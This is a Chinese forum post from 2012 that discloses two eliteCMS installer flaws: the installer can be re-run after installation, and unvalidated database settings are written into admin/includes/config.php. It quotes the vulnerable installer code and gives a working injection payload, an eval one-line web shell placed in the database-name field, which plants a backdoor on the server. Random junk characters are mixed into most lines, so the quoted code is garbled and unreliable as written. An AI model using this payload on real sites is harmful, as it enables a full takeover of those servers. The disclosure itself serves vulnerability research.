eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装, T5 S, R% K' w& m( ^& h
' O3 {2 w' p" b3 ^3 Z
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php) a( n# _7 ?5 L- B7 F5 H4 ^9 S
我们来看代码:
R: R+ o: L. z6 G$ m) O
+ x. G% J) \& X7 o* p$ |...8 u! m8 d! j, M$ N0 t) q
elseif ($_GET['step'] == "4") {5 e* u7 O4 _) J) |- @
$file = "../admin/includes/config.php";9 a# |2 E( u- F" x6 C, |' h3 t
$write = "<?php\n";7 ?* f5 r. J, J$ h+ X0 _$ B0 q
$write .= "/**\n";
# c9 C) R3 r3 O% o/ Y $write .= "*\n";2 U9 X/ D' G3 d8 X5 N
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
/ U V0 }4 C! j; D G! t/ t...略...
. F2 g% F/ N( _- D+ @! l; K# a $write .= "*\n";. O- F' K& R5 n: t# ^8 @ G# V
$write .= "*/\n";* R2 X2 j8 p' p! R, g. J; J
$write .= "\n";
6 H1 b. F8 e2 ~( k/ c; A $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
1 F8 N$ F U; @% k" a $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
/ a# O, B; y0 D) ?& ~, j $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";* u4 Y# x+ K- Q7 e8 [+ }
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
9 t/ P9 J$ M& T" i $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
9 y4 \% K- r, `( X* | $write .= "if (!\$connection) {\n";& ~$ p: v! P* t+ W" _9 L
$write .= " die(\"Database connection failed\" .mysql_error());\n";7 [- T( F: A" i$ A0 K I; M( z
$write .= " \n";
4 D+ Z6 G) U7 U* P7 S7 H- ~ $write .= "} \n";# p& n: Z! v' I7 z+ p
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";! o! @$ X m$ y" U$ O; I; E6 T
$write .= "if (!\$db_select) {\n";3 R8 n" F! p9 ]7 V9 X7 a1 ~/ ?
$write .= " die(\"Database select failed\" .mysql_error());\n";4 M' u; ?( j: P& {& W
$write .= " \n";4 a7 Y9 Y9 p# i u2 j0 ]
$write .= "} \n";
- {( ]0 Z+ ]2 `. c; j $write .= "?>\n";
, u. J( ~- S: A* Z
- f) F& E' W4 c" m $writer = fopen($file, 'w');
0 h$ V) [/ N7 R w/ A2 y- \...: a+ g! P& j9 q9 ~; n" h
( \7 U' z9 Z! z) D
在看代码:
% i4 Y6 D' f5 |4 n% b& U
$ z' q# u! h l$ }$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
( n; A/ z% q+ O. H' r+ x$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$ s% \& D; C N4 l8 s. q9 a7 ]$_SESSION['DB_USER'] = $_POST['DB_USER'];/ `. z8 e! k" M
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];5 L! u) C3 j* n4 J5 i. M# v% C# o
* O$ ?; \+ h! j# |0 U取值未作任何验证# q, `2 z' r" i) {
如果将数据库名POST数据:
+ P! g) e. T/ M0 P7 d5 O
; }1 K7 j' h, S"?><?php eval($_POST[c]);?><?php0 k8 s% ]- |/ k9 e/ }
! x% x. _4 I! _) Q# u) @; r, }
将导致一句话后门写入/admin/includes/config.php
( D& D7 ^3 H* a4 r0 J+ d |
发表于 2012-11-18 13:59:27
收藏
支持
反对